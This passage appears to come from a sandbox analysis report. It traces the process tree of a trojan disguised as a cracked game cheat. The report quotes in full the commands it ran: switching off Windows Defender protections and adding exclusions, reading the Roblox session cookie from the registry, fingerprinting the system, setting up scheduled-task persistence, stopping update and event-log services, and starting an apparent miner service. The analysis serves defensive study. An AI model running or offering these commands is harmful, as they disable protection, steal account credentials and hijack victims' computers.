    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2420
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2572
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2716
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:2544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2320
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:1256
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
    3⤵
    PID:1516
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      Runs ping.exe
      PID:2032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2320
- C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
  "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
  2⤵
  - Drops startup file
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2528
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Drops startup file
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2780
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1888
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2744
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:2764
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1532
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\svchost.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1632
- C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
  "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
  2⤵
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:948
- - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
    3⤵
    - Executes dropped EXE
    PID:1484
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1748
- - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
    3⤵
    - Executes dropped EXE
    PID:532
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2200
- - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
    "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
    3⤵
    - Drops startup file
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    PID:2128
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:300
- - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
    "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
    3⤵
    - Loads dropped DLL
    - Adds Run key to start application
    PID:3044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2376
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
      4⤵
      Executes dropped EXE
      PID:2576
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2216
  - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
      4⤵
      Drops file in Drivers directory
      Executes dropped EXE
      PID:836
    - - C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2172
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2888
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2960
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1192
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        5⤵
        
        PID:2472
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        5⤵
        
        PID:976
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        5⤵
        
        PID:2216
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1616
    - - C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:772
    - - C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        5⤵
        
        PID:376
      - C:\Windows\system32\PING.EXE
        
        ping localhost
        6⤵
        Runs ping.exe
        
        PID:3044
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1576
  - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
      "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:896
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:2124
  - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
      "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
      4⤵
      Loads dropped DLL
      Adds Run key to start application
      PID:1536
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1584
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        5⤵
        Executes dropped EXE
        
        PID:3004
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2488
    - - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        5⤵
        Executes dropped EXE
        
        PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2540
    - - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        5⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2548
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:2520
    - - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        5⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2404
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:780
      - C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        6⤵
        Executes dropped EXE
        
        PID:2268
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2620
      - C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        6⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:2040
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2520
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:1252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:2264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        7⤵
        
        PID:2272
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:2960
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:448
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:752
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        
        PID:1824
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:532
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        7⤵
        
        PID:2376
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        8⤵
        Runs ping.exe
        
        PID:2216
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2172
      - C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        6⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2936
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:2444
      - C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        6⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:3000
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        7⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:564
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        7⤵
        Executes dropped EXE
        Drops file in System32 directory
        
        PID:2304
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        
        PID:2208
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        8⤵
        
        PID:896
        
        C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        9⤵
        Drops file in Windows directory
        
        PID:1772
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        8⤵
        
        PID:1684
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        8⤵
        Launches sc.exe
        
        PID:1812
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        8⤵
        Launches sc.exe
        
        PID:1320
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        8⤵
        Launches sc.exe
        
        PID:1632
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        8⤵
        
        PID:2504
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        8⤵
        Power Settings
        
        PID:1552
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        8⤵
        Power Settings
        
        PID:840
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        8⤵
        Power Settings
        
        PID:2980
        
        C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        8⤵
        Power Settings
        
        PID:3020
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        8⤵
        Launches sc.exe
        
        PID:2228
        
        C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "XMRKNZQC"
        8⤵
        Launches sc.exe
        
        PID:1568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2152
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        7⤵
        Executes dropped EXE
        
        PID:620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        7⤵
        
        PID:1688
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        7⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1852
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        7⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        8⤵
        
        PID:1848
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        8⤵
        Executes dropped EXE
        
        PID:2980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        8⤵
        
        PID:1496
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        8⤵
        Drops file in Drivers directory
        Executes dropped EXE
        
        PID:780
        
        C:\Windows\system32\attrib.exe
        
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        9⤵
        Views/modifies file attributes
        
        PID:2112
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2928
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        9⤵
        
        PID:2248
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:1888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        9⤵
        
        PID:1108
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        9⤵
        
        PID:2080
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        9⤵
        
        PID:2520
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        9⤵
        
        PID:2488
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        9⤵
        
        PID:2660
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        9⤵
        Detects videocard installed
        
        PID:2776
        
        C:\Windows\system32\cmd.exe
        
        "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe" && pause
        9⤵
        
        PID:1228
        
        C:\Windows\system32\PING.EXE
        
        ping localhost
        10⤵
        Runs ping.exe
        
        PID:2864
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2092
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        8⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1368
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        8⤵
        Loads dropped DLL
        Adds Run key to start application
        
        PID:2460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2380
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan Setup.exe"
        9⤵
        Executes dropped EXE
        
        PID:1648
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe'
        9⤵
        
        PID:1932
        
        C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Запустить Nursultan.exe"
        9⤵
        Executes dropped EXE
        
        PID:2452
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Nursultan.exe'
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2012
        
        C:\Users\Admin\AppData\Local\Temp\Nursultan.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Nursultan.exe"
        9⤵
        Drops startup file
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:1780
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:1660
        
        C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe
        
        "C:\Users\Admin\AppData\Local\Temp\CrackLauncher.exe"
        9⤵
        Loads dropped DLL
        
        PID:2056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
